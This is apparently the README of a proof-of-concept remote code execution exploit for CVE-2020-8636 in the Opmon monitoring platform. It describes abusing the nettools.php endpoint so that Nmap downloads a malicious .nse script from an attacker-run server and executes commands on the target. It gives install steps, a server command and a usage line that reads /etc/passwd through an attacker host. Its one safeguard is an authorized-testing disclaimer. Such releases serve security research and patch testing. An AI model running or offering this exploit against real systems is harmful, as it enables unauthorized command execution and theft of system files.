About • Install • Usage • License
OpMonster is a proof-of-concept exploit for CVE-2020-8636, a remote code
execution vulnerability in the Opmon monitoring platform. It abuses the
nettools.php endpoint, which lets you run Nmap with arbitrary --script options.
The exploit makes Opmon fetch a malicious .nse Nmap script from a server you
control (via http-fetch), drops it in /tmp, then runs it to execute your command
on the target and prints the output.
Discovered and developed by @phor3nsic. More details: Three CVEs on Opmon.
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requestsFirst, start a web server on a host the target can reach, in a directory where the
generated .nse script can be downloaded from (the exploit writes the script into the
current directory):
php -S 0.0.0.0:1337Then run the exploit with four positional arguments:
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"| Argument | Description |
|---|---|
HOST |
Target Opmon base URL (e.g. https://vulnhost.com) |
LHOST |
Your server host that serves the .nse script |
LPORT |
Your server port |
CMD |
Command to execute on the target |
The exploit aborts with a message if the target does not download the script ("not vulnerable") or cannot make an outbound connection to your server.
For authorized security testing and education only. You are responsible for how you use it.
